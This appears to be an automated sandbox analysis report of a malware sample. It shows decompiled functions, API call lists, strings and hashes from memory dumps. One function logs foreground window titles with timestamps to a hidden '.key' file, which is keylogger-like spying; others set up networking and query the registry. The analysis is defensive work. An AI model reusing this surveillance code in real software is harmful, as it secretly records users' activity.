Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Process32$AddressFirstLibraryLoadNextProc
String ID: CreateToolhelp32Snapshot$Kernel32.dll$Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij
API String ID: 2986541420-2015010282
Opcode ID: ce875f2bec32f9a6e888381f9e06f0bbead54a41f50c33a28c262a6d8e178eec
Instruction ID: 5ef8d13effb0aeb461d1720b0477da0586acb63689904a091abf65901958ee6e
Opcode Fuzzy Hash: ce875f2bec32f9a6e888381f9e06f0bbead54a41f50c33a28c262a6d8e178eec
Instruction Fuzzy Hash: CB01F53590121CEBFB40EB959D8DAED77BCEB14396F1002B2AD51E2094DB309E81DA10

Uniqueness

Uniqueness Score: -1.00%

Function 10001603, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 50
networkCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10001603(intOrPtr __ecx, void* __eflags) {
				void* _t29;
				void* _t34;
				void* _t43;
				intOrPtr _t44;
				void* _t46;

				E100158AC(E1001A0A8, _t46);
				_t44 = __ecx;
				 *((intOrPtr*)(_t46 - 0x14)) = __ecx;
				E10001000(__ecx + 4);
				 *((intOrPtr*)(_t46 - 4)) = 0;
				E10001000(__ecx + 0x14);
				 *((char*)(_t46 - 4)) = 1;
				E10001000(__ecx + 0x24);
				 *((char*)(_t46 - 4)) = 2;
				E10001000(__ecx + 0x34);
				 *((char*)(_t46 - 4)) = 3;
				 *((intOrPtr*)(__ecx)) = 0x1001b3e8;
				 *0x10027384(0x202, _t46 - 0x1a4, _t43, _t34);
				_t29 = CreateEventA(0, 1, 0, 0);
				 *(_t44 + 0x48) =  *(_t44 + 0x48) | 0xffffffff;
				 *(_t44 + 0x4c) = _t29;
				 *((char*)(_t44 + 0x53)) = 0;
				 *(_t46 - 0x10) = 0x53;
				 *((char*)(_t46 - 0xf)) = 0x56;
				 *((char*)(_t46 - 0xe)) = 9;
				memcpy(_t44 + 0x50, _t46 - 0x10, 3);
				 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
				return _t44;
			}

0x10001608
0x10001615
0x10001617
0x1000161d
0x10001627
0x1000162a
0x10001632
0x10001636
0x1000163e
0x10001642
0x1000164d
0x10001657
0x1000165d
0x10001668
0x1000166e
0x10001672
0x1000167f
0x10001682
0x10001686
0x1000168a
0x1000168e
0x1000169c
0x100016a6

APIs

__EH_prolog.LIBCMT ref: 10001608
WSAStartup.WS2_32(00000202,?), ref: 1000165D
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 10001668
memcpy.MSVCRT ref: 1000168E

Strings

V, xrefs: 10001686
S, xrefs: 10001682
Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 10001613

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateEventH_prologStartupmemcpy
String ID: S$V$Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij
API String ID: 2412012656-3411242467
Opcode ID: 0dc4883a9e9e636e658efa193a2a26aa408f9a6f98680d716444270057e8b71d
Instruction ID: 125714b2ccdeb17eda087064bd824db547a1882151a6225066e81cc4deaa7b2a
Opcode Fuzzy Hash: 0dc4883a9e9e636e658efa193a2a26aa408f9a6f98680d716444270057e8b71d
Instruction Fuzzy Hash: 5411B271800794DEE721DBA8C9857DEBBF8EF04344F00455DF09693282DBB0A748CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0041AF08, Relevance: 12.3, APIs: 8, Instructions: 297
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041AF08(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t114;
				intOrPtr _t118;
				intOrPtr* _t119;
				void* _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr* _t127;
				void _t129;
				intOrPtr* _t131;
				long _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void _t139;
				void _t141;
				void* _t143;
				void* _t144;
				void* _t147;
				void* _t148;
				void _t149;
				void* _t151;
				intOrPtr* _t153;
				void* _t154;
				void _t158;
				void* _t159;
				void _t161;
				intOrPtr* _t163;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t186;
				intOrPtr* _t206;
				void* _t210;
				intOrPtr* _t219;
				intOrPtr* _t221;
				void* _t222;
				void* _t224;

				_push(0x68);
				_t114 = E004271DA(E0043AB20, __ebx, __edi, __esi);
				_t221 = __ecx;
				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
				_t219 = __ecx + 0x50;
				 *(_t224 - 0x10) = 0;
				if( *_t219 != 0) {
					L2:
					 *(_t224 + 8) = 0;
					 *(_t224 - 0x14) = 0;
					 *((intOrPtr*)(_t224 + 0x14)) = 0;
					E004197B9(_t221, _t221 + 0x40);
					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
					if(_t118 != 0) {
						L5:
						_t222 =  *(_t224 + 0xc);
						if(_t222 == 0) {
							__eflags =  *(_t224 + 0x10);
							if( *(_t224 + 0x10) != 0) {
								L16:
								_t119 =  *_t219;
								_t210 = _t224 - 0x14;
								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x441e54, _t210);
								__eflags = _t120;
								if(_t120 < 0) {
									L43:
									if( *(_t224 - 0x10) >= 0) {
										L46:
										_t121 =  *((intOrPtr*)(_t224 + 0x14));
										if(_t121 != 0) {
											 *((intOrPtr*)( *_t121 + 8))(_t121);
										}
										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
											 *(_t224 - 0x10) = 1;
										}
										_t122 =  *(_t224 - 0x10);
										L52:
										return E004272B2(_t122);
									}
									L44:
									_t125 =  *_t219;
									if(_t125 != 0) {
										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
										_t127 =  *_t219;
										 *((intOrPtr*)( *_t127 + 8))(_t127);
										 *_t219 = 0;
									}
									goto L46;
								}
								__eflags = _t222;
								if(_t222 != 0) {
									__eflags =  *(_t224 + 0x10);
									if( *(_t224 + 0x10) == 0) {
										 *(_t224 - 0x10) = 0x8000ffff;
										L37:
										_t129 =  *(_t224 - 0x14);
										L38:
										 *((intOrPtr*)( *_t129 + 8))(_t129);
										L39:
										if( *(_t224 - 0x10) < 0) {
											goto L44;
										}
										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
											_t186 =  *((intOrPtr*)(_t224 - 0x24));
											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
												_t131 =  *_t219;
												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
											}
										}
										goto L43;
									}
									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
									__eflags = _t210;
									 *(_t224 - 0x2c) = _t134;
									if(__eflags > 0) {
										L29:
										 *(_t224 - 0x10) = 0x8007000e;
										 *(_t224 + 0x10) = 0;
										L30:
										__eflags =  *(_t224 + 0x10);
										 *(_t224 - 0x1c) = 0;
										if( *(_t224 + 0x10) == 0) {
											goto L37;
										}
										_t135 = _t224 - 0x1c;
										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
										__eflags = _t135;
										 *(_t224 - 0x10) = _t135;
										if(_t135 < 0) {
											goto L37;
										}
										_t136 = _t224 - 0x18;
										 *(_t224 - 0x18) = 0;
										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
										__eflags = _t136;
										 *(_t224 - 0x10) = _t136;
										if(_t136 >= 0) {
											_t139 =  *(_t224 - 0x14);
											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
											_t141 =  *(_t224 - 0x18);
											 *((intOrPtr*)( *_t141 + 8))(_t141);
										}
										_t137 =  *(_t224 - 0x1c);
										L35:
										 *((intOrPtr*)( *_t137 + 8))(_t137);
										goto L37;
									}
									if(__eflags < 0) {
										L26:
										_t143 = GlobalAlloc(0, _t134);
										__eflags = _t143;
										 *(_t224 + 0x10) = _t143;
										if(_t143 == 0) {
											goto L29;
										}
										_t144 = GlobalLock(_t143);
										__eflags = _t144;
										if(_t144 == 0) {
											goto L29;
										}
										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
										GlobalUnlock( *(_t224 + 0x10));
										goto L30;
									}
									__eflags = _t134 - 0xffffffff;
									if(_t134 >= 0xffffffff) {
										goto L29;
									}
									goto L26;
								}
								_t147 = _t224 + 0xc;
								 *(_t224 + 0xc) = 0;
								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
								__eflags = _t147;
								 *(_t224 - 0x10) = _t147;
								if(_t147 < 0) {
									goto L37;
								}
								_t148 = _t224 + 0x10;
								 *(_t224 + 0x10) = 0;
								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
								__eflags = _t148;
								 *(_t224 - 0x10) = _t148;
								if(_t148 >= 0) {
									_t149 =  *(_t224 - 0x14);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
									_t151 =  *(_t224 + 0x10);
									 *((intOrPtr*)( *_t151 + 8))(_t151);
								}
								_t137 =  *(_t224 + 0xc);
								goto L35;
							}
							L11:
							_t153 =  *_t219;
							_t213 = _t224 + 8;
							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x441f04, _t224 + 8);
							__eflags = _t154;
							if(_t154 < 0) {
								goto L16;
							} else {
								__eflags = _t222;
								if(__eflags != 0) {
									E00417DD0(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
									 *(_t224 - 4) = 0;
									E0042450E(_t224 - 0x2c, _t224 - 0x74);
									_t158 =  *(_t224 + 8);
									_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
									_t47 = _t224 - 4;
									 *_t47 =  *(_t224 - 4) | 0xffffffff;
									__eflags =  *_t47;
									 *(_t224 - 0x10) = _t159;
									E00417D92(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
								} else {
									_t161 =  *(_t224 + 8);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
								}
								_t129 =  *(_t224 + 8);
								goto L38;
							}
						}
						if( *(_t224 + 0x10) != 0) {
							goto L16;
						}
						_t163 =  *_t219;
						_push(_t224 + 0x14);
						_push(0x441f14);
						_push(_t163);
						if( *((intOrPtr*)( *_t163))() < 0) {
							goto L11;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(3);
						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
							goto L11;
						} else {
							 *(_t224 + 0x10) = 0;
							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
							_t206 =  *((intOrPtr*)(_t224 + 0x14));
							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
							_t170 =  *((intOrPtr*)(_t224 + 0x14));
							 *((intOrPtr*)( *_t170 + 8))(_t170);
							 *((intOrPtr*)(_t224 + 0x14)) = 0;
							goto L39;
						}
					}
					_t172 =  *_t219;
					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
						goto L5;
					}
					_t174 =  *_t219;
					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
					 *(_t224 - 0x10) = _t175;
					if(_t175 < 0) {
						goto L44;
					}
					goto L5;
				}
				_t122 = E004195C0(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x441e04, _t219,  *((intOrPtr*)(_t224 + 0x14)));
				 *(_t224 - 0x10) = _t122;
				if(_t122 < 0) {
					goto L52;
				}
				goto L2;
			}

APIs

__EH_prolog3.LIBCMT ref: 0041AF0F

Part of subcall function 004195C0: SysStringLen.OLEAUT32(?), ref: 004195C8
Part of subcall function 004195C0: CoGetClassObject.OLE32(?,?,00000000,00441E84,?), ref: 004195E6

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 0041B099
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 0041B0BA
GlobalAlloc.KERNEL32(00000000,00000000), ref: 0041B107
GlobalLock.KERNEL32 ref: 0041B115
GlobalUnlock.KERNEL32(?), ref: 0041B12D
CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 0041B150
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 0041B16C

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
String ID:
API String ID: 317715441-0
Opcode ID: de54ea739fc7910b07c4836b410bb547e38cffd1e0fbd9e009b0ad6a9e09ef61
Instruction ID: 4c03f972a5dc34498395ff93685d317e015d5f345124410817bf1f4c641f5a16
Opcode Fuzzy Hash: de54ea739fc7910b07c4836b410bb547e38cffd1e0fbd9e009b0ad6a9e09ef61
Instruction Fuzzy Hash: 59C11BB090020AEFDB10DFA4C898AEEBBB9FF48344B10496EF915D7250D7759D91CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10002D28, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 36
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10002D28() {
				int _v8;
				void* _v12;
				int _v16;
				char _v276;
				char* _t13;
				long _t15;

				strcpy( &_v276, "SYSTEM\\CurrentControlSet\\Services");
				_t13 = RegOpenKeyExA(0x80000001,  &_v276, 0, 0x20019,  &_v12);
				_push(0x50);
				L10015806();
				_v8 = 1;
				_v16 = 0x50;
				_t15 = RegQueryValueExA(_v12, "Group", 0,  &_v8, _t13,  &_v16);
				if(_t15 != 0) {
					return E10002C28();
				}
				return _t15;
			}

0x10002d3d
0x10002d5b
0x10002d61
0x10002d63
0x10002d69
0x10002d73
0x10002d8a
0x10002d92
0x00000000
0x10002d94
0x10002d9a

APIs

strcpy.MSVCRT(?,SYSTEM\CurrentControlSet\Services), ref: 10002D3D
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 10002D5B
#823.MFC42(00000050), ref: 10002D63
RegQueryValueExA.ADVAPI32(?,Group,00000000,00000001,00000000,?), ref: 10002D8A

Part of subcall function 10002C28: wsprintfA.USER32 ref: 10002C45
Part of subcall function 10002C28: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,10002D99), ref: 10002C66
Part of subcall function 10002C28: #823.MFC42(00000050), ref: 10002C70
Part of subcall function 10002C28: RegQueryValueExA.ADVAPI32(10002D99,Group,00000000,?,00000000,?), ref: 10002C92
Part of subcall function 10002C28: strlen.MSVCRT ref: 10002CA8
Part of subcall function 10002C28: GetLocalTime.KERNEL32(?), ref: 10002CCB
Part of subcall function 10002C28: wsprintfA.USER32 ref: 10002CF3
Part of subcall function 10002C28: strlen.MSVCRT ref: 10002D01

Strings

P, xrefs: 10002D73
SYSTEM\CurrentControlSet\Services, xrefs: 10002D37
Group, xrefs: 10002D82

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: #823OpenQueryValuestrlenwsprintf$LocalTimestrcpy
String ID: Group$P$SYSTEM\CurrentControlSet\Services
API String ID: 4281382822-665066829
Opcode ID: cd61255a60d96570896b20b5e8195f0be02c76ec6ee20976df50f17f179b629e
Instruction ID: 533aeadec7babbf5ba7c24673ba36b4fd5fe243bfbac4fb9ee696d6d3452d735
Opcode Fuzzy Hash: cd61255a60d96570896b20b5e8195f0be02c76ec6ee20976df50f17f179b629e
Instruction Fuzzy Hash: 80F0BD7590020CBEFB15EB90DC46FEE777CEB08745F504499B615A50C1DBB0AA888A65

Uniqueness

Uniqueness Score: -1.00%

Function 100140C2, Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 85
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E100140C2(char* _a4) {
				void* _t3;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				signed int _t11;
				void* _t13;
				char* _t32;
				char* _t34;

				_t32 = _a4;
				_t34 =  &(_t32[strlen(_t32)]);
				while(_t34 > _t32) {
					if( *_t34 == 0x2e) {
						__eflags = _t34 - _t32;
						break;
					}
					_t34 = _t34 - 1;
				}
				if(__eflags != 0) {
					L8:
					_t3 = E10015700(_t2, _t34, ".Z");
					__eflags = _t3;
					if(_t3 != 0) {
						_t4 = E10015700(_t3, _t34, ".zip");
						__eflags = _t4;
						if(_t4 == 0) {
							goto L9;
						}
						_t6 = E10015700(_t4, _t34, ".zoo");
						__eflags = _t6;
						if(_t6 == 0) {
							goto L9;
						}
						_t7 = E10015700(_t6, _t34, ".arc");
						__eflags = _t7;
						if(_t7 == 0) {
							goto L9;
						}
						_t8 = E10015700(_t7, _t34, ".lzh");
						__eflags = _t8;
						if(_t8 == 0) {
							goto L9;
						}
						_t9 = E10015700(_t8, _t34, ".arj");
						__eflags = _t9;
						if(_t9 == 0) {
							goto L9;
						}
						_t10 = E10015700(_t9, _t34, ".gz");
						__eflags = _t10;
						if(_t10 == 0) {
							goto L9;
						}
						_t11 = E10015700(_t10, _t34, ".tgz");
						asm("sbb al, al");
						_t13 =  ~_t11 + 1;
						__eflags = _t13;
						return _t13;
					}
					L9:
					return 1;
				}
				__eflags =  *_t34 - 0x2e;
				if( *_t34 == 0x2e) {
					goto L8;
				}
				return 0;
			}

0x100140c7
0x100140d3
0x100140d5
0x100140dc
0x100140e1
0x00000000
0x100140e1
0x100140de
0x100140de
0x100140e3
0x100140f1
0x100140f7
0x100140fd
0x10014100
0x1001410c
0x10014112
0x10014115
0x00000000
0x00000000
0x1001411d
0x10014123
0x10014126
0x00000000
0x00000000
0x1001412e
0x10014134
0x10014137
0x00000000
0x00000000
0x1001413f
0x10014145
0x10014148
0x00000000
0x00000000
0x10014150
0x10014156
0x10014159
0x00000000
0x00000000
0x10014161
0x10014167
0x1001416a
0x00000000
0x00000000
0x10014172
0x1001417a
0x1001417d
0x1001417d
0x00000000
0x1001417d
0x10014102
0x00000000
0x10014102
0x100140e5
0x100140e8
0x00000000
0x00000000
0x00000000

APIs

strlen.MSVCRT ref: 100140CB

Part of subcall function 10015700: _mbsicmp.MSVCRT ref: 10015709

Strings

.tgz, xrefs: 1001416C
.arc, xrefs: 10014128
.lzh, xrefs: 10014139
.gz, xrefs: 1001415B
.zoo, xrefs: 10014117
.arj, xrefs: 1001414A
.zip, xrefs: 10014106

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: _mbsicmpstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 374816253-51310709
Opcode ID: 8472a485f2b839ab0cedee47f9233fa4fbe6bd094aae4829d6234b611f1b90d6
Instruction ID: 28f6ab35dd91303ce520a8cc8436e780c7bca527a3b50d64ab124d6be317641e
Opcode Fuzzy Hash: 8472a485f2b839ab0cedee47f9233fa4fbe6bd094aae4829d6234b611f1b90d6
Instruction Fuzzy Hash: 10119E3E049923B4661BE2657C129DB27C8CF1B1B27F6002AFA44AE8D2DF36DDC10195

Uniqueness

Uniqueness Score: -1.00%

Function 00414809, Relevance: 12.1, APIs: 8, Instructions: 85
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00414809(void* __eflags) {
				intOrPtr _v4;
				struct HWND__* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t30;
				struct HWND__* _t33;
				intOrPtr _t36;
				intOrPtr _t40;
				int _t41;
				intOrPtr _t43;
				void* _t44;
				void* _t52;
				signed int _t54;
				void* _t62;
				void* _t64;
				signed int _t67;
				void* _t74;

				_t74 = __eflags;
				_t67 = _t54;
				_push(_t62);
				_t30 = lstrlenA( *( *((intOrPtr*)(_t67 + 0x74)) + 0x1c));
				_t52 = 0;
				E004277B0(_t62,  &(( *( *((intOrPtr*)(_t67 + 0x74)) + 0x1c))[_t30 + 1]), 0,  *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x74)) + 0x20)) - _t30 + 1);
				_t33 = GetFocus();
				_t63 =  *((intOrPtr*)(_t67 + 0x74));
				_v8 = _t33;
				 *( *((intOrPtr*)(_t67 + 0x74)) + 4) = E0040C30C(0, _t67, _t74);
				E00410EEA(0,  *((intOrPtr*)(_t67 + 0x74)), _t67, _t74);
				_t36 =  *((intOrPtr*)(_t67 + 0x74));
				if( *(_t36 + 4) != 0 && IsWindowEnabled( *(_t36 + 4)) != 0) {
					_t52 = 1;
					EnableWindow( *( *((intOrPtr*)(_t67 + 0x74)) + 4), 0);
				}
				_t64 = E0040E15E(_t52, _t63, _t67, 1);
				if(( *( *((intOrPtr*)(_t67 + 0x74)) + 0x34) & 0x00080000) == 0) {
					E004128B9(_t52, _t64, __eflags, _t67);
				} else {
					 *(_t64 + 0x18) = _t67;
				}
				_push( *((intOrPtr*)(_t67 + 0x74)));
				if( *((intOrPtr*)(_t67 + 0x78)) == 0) {
					_t40 = E004147F2();
				} else {
					_t40 = E004147DB();
				}
				 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
				_v4 = _t40;
				if(_t52 != 0) {
					EnableWindow( *( *((intOrPtr*)(_t67 + 0x74)) + 4), 1);
				}
				_t41 = IsWindow(_v8);
				_t81 = _t41;
				if(_t41 != 0) {
					SetFocus(_v8);
				}
				E0040C346(_t52, _t67, _t64, _t67, _t81);
				_t43 = _v4;
				if(_t43 == 0) {
					_t44 = 2;
					return _t44;
				}
				return _t43;
			}

APIs

lstrlenA.KERNEL32(?,?,00000000,?,?,?,?,0040150E,00000001,00000000,00000000,00000006,00442798,00000000,00000000,8E7DE579), ref: 00414817
_memset.LIBCMT ref: 00414830
GetFocus.USER32 ref: 00414838
IsWindowEnabled.USER32(?), ref: 00414865
EnableWindow.USER32(?,00000000), ref: 00414878
EnableWindow.USER32(?,00000001), ref: 004148C1
IsWindow.USER32(?), ref: 004148C7
SetFocus.USER32(?), ref: 004148D5

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnableFocus$Enabled_memsetlstrlen
String ID:
API String ID: 2950697994-0
Opcode ID: 00adbc9a233fabc1c35c7c8caf6f181f9bd7698a11af9325482d4df268485e99
Instruction ID: 14070ca3c4857ef2bdef4c0e9fb2bcb010b476837c57688a8cf6be0fa9c418d9
Opcode Fuzzy Hash: 00adbc9a233fabc1c35c7c8caf6f181f9bd7698a11af9325482d4df268485e99
Instruction Fuzzy Hash: 2721CE31600B009FD721AF71ED89B5ABBE5FF80704F104A2EF556872A1DB79E851CB58

Uniqueness

Uniqueness Score: -1.00%

Function 1000415A, Relevance: 12.1, APIs: 8, Instructions: 76
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1000415A() {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				void _v1047;
				void _v1048;
				struct HWND__* _t20;
				struct HWND__* _t24;
				struct HWND__* _t27;
				void* _t52;

				memset(0x10026c00, 0, 0x400);
				_t20 = GetForegroundWindow();
				 *0x10027000 = _t20;
				GetWindowTextA(_t20, 0x10026c00, 0x400);
				_v1048 = _v1048 & 0x00000000;
				memset( &_v1047, 0, 0xff << 2);
				_v8 = _v8 & 0x00000000;
				asm("stosw");
				asm("stosb");
				_t24 =  *0x10027000; // 0x0
				_t52 = _t24 -  *0x10026bfc; // 0x0
				if(_t52 != 0) {
					if(lstrlenA(0x10026c00) > 0) {
						GetLocalTime( &_v24);
						wsprintfA( &_v1048, 0x10023f00, 0x10026c00, _v24.wYear & 0x0000ffff, _v24.wMonth & 0x0000ffff, _v24.wDay & 0x0000ffff, _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff);
						E10004029( &_v1048);
						memset( &_v1048, 0, 0x400);
						memset(0x10026c00, 0, 0x400);
						_v8 = 1;
					}
					_t27 =  *0x10027000; // 0x0
					 *0x10026bfc = _t27;
				}
				return _v8;
			}

0x10004174
0x1000417d
0x10004186
0x1000418b
0x10004191
0x100041a5
0x100041a7
0x100041ab
0x100041ad
0x100041ae
0x100041b3
0x100041b9
0x100041c8
0x100041ce
0x100041ff
0x1000420c
0x1000421b
0x10004225
0x1000422e
0x1000422e
0x10004235
0x1000423a
0x1000423a
0x10004246

APIs

memset.MSVCRT ref: 10004174
GetForegroundWindow.USER32 ref: 1000417D
GetWindowTextA.USER32 ref: 1000418B
lstrlenA.KERNEL32(10026C00), ref: 100041C0
GetLocalTime.KERNEL32(?), ref: 100041CE
wsprintfA.USER32 ref: 100041FF

Part of subcall function 10004029: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000,?,?,00000258), ref: 10004042
Part of subcall function 10004029: PathFileExistsA.SHLWAPI(?), ref: 1000404F
Part of subcall function 10004029: strcat.MSVCRT(?,10023EE0), ref: 10004065
Part of subcall function 10004029: strcat.MSVCRT(?,Fatal,?,10023EE0), ref: 10004076
Part of subcall function 10004029: strcat.MSVCRT(?,.key,?,Fatal,?,Windows\), ref: 100040BD
Part of subcall function 10004029: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 100040DC
Part of subcall function 10004029: GetFileSize.KERNEL32(00000000,00000000), ref: 100040EA
Part of subcall function 10004029: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 100040FE
Part of subcall function 10004029: lstrlenA.KERNEL32(10004412), ref: 1000410D
Part of subcall function 10004029: #823.MFC42(00000000), ref: 10004112
Part of subcall function 10004029: lstrlenA.KERNEL32(10004412,10004412,00000000), ref: 10004138
Part of subcall function 10004029: WriteFile.KERNEL32(?,00000000,00000000), ref: 1000413F
Part of subcall function 10004029: CloseHandle.KERNEL32(?), ref: 10004148
Part of subcall function 10004029: #825.MFC42(00000000), ref: 1000414F

memset.MSVCRT ref: 1000421B
memset.MSVCRT ref: 10004225

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: File$lstrlenmemsetstrcat$PathWindow$#823#825CloseCreateExistsFolderForegroundHandleLocalPointerSizeSpecialTextTimeWritewsprintf
String ID:
API String ID: 4125517826-0
Opcode ID: b0a6abb4fff2f84686017d321d5216769f7ad1549b8909420c39b45e70d7e724
Instruction ID: 6d2f4295b0f734b6544844ff07828c3828fc8902a7c0a12feb0875903c0ff307
Opcode Fuzzy Hash: b0a6abb4fff2f84686017d321d5216769f7ad1549b8909420c39b45e70d7e724
Instruction Fuzzy Hash: 9D2110B1900228BBEB11DBA8CD88FEE77BCFB48355F104061F605E2191D7389B859B79

Uniqueness

Uniqueness Score: -1.00%

Function 100034CB, Relevance: 12.1, APIs: 8, Instructions: 66COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100034D0
?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,000000FF,00000000), ref: 100034E6
